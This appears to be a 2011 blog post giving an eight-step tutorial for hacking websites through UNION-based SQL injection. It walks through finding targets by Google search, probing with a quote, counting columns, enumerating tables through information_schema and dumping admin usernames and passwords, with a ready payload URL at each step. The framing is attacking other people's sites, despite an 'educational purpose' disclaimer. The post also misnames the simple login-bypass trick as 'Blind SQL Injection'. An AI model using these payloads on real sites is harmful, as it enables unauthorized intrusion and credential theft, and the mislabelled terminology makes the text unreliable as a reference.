Thursday, 8 December 2011

Hack SQL Vulnerable Websites In 8 Steps (SQL Injection)

As you have already gone through basic SQL injection (which is also called as Blind SQL Injection & mostly used by noobs) for hacking sites like using queries in admin & password fields as 1' or '1' = '1 or many like it. Today I will tell about how we can hack SQL vulnerable sites. This tutorial is only for educational purpose, it will show you how to attack on SQL databases of vulnerable sites. Follow these steps:


  1. Find SQL vulnerable site, for e.g. 
    http://www.example.com/index.php?id=3 (Easy way is to google it using "inurl:")
  2. Check whether it's vulnerable or not, enter a ' after the 3 in the url, for e.g.
    http://www.example.com/index.php?id=3'

    If page gives error, means you can continue, site is vulnerable. But if page loads without error, then website is not vulnerable.
  3. Now find the number of columns in the database using "order by", for e.g.
    http://www.example.com/index.php?id=3 order by 1--
    http://www.example.com/index.php?id=3 order by 2--
    http://www.example.com/index.php?id=3 order by 3--
    http://www.example.com/index.php?id=3 order by 4--
    http://www.example.com/index.php?id=3 order by 5--
    http://www.example.com/index.php?id=3 order by 6--

    If you receive error here, means we have 5 columns. If the site give error on "order by 8", then we would have 7 columns.
  4. Now find the vulnerable columns in existing 5 columns, for e.g.
    http://www.example.com/index.php?id=3 union all select 1,2,3,4,5--

    If it executes successfully, then page will show some numbers on the page. For e.g. 2 and 5, means columns 2 and 5 are vulnerable.
  5. Find the database version, user & name with commands:
    http://www.example.com/index.php?id=3 union all select 1,user(),3,4,version()--
    http://www.example.com/index.php?id=3 union all select 1,version(),3,4,database()--

    Note: If the version is 5 and above, then carry on.
     
  6. Now list all the table names using command after the url:
    union all select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

    For e.g. http://www.example.com/index.php?id=3 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

    Take a glance at some useful tables like admin, user etc. Suppose you get table name admin.
  7. Now list all the column names using:
    union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()--

    For e.g.: http://www.example.com/index.php?id=3 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()--

    Find some useful columns from it like username, passwd etc.
  8. Final step, retrieving the username & password fields from table admin (as mentioned above), use the command:
    union all select 1,group_concat(username,0x3a,passwd),3,4,5 from admin--
    Where admin is the table name.

    For e.g.: http://www.example.com/index.php?id=3 union all select 1,group_concat(username,0x3a,passwd),3,4,5 from admin--
That's all. Now you have admin username & password. Enjoy!!

No comments:

Post a Comment

Note: only a member of this blog may post a comment.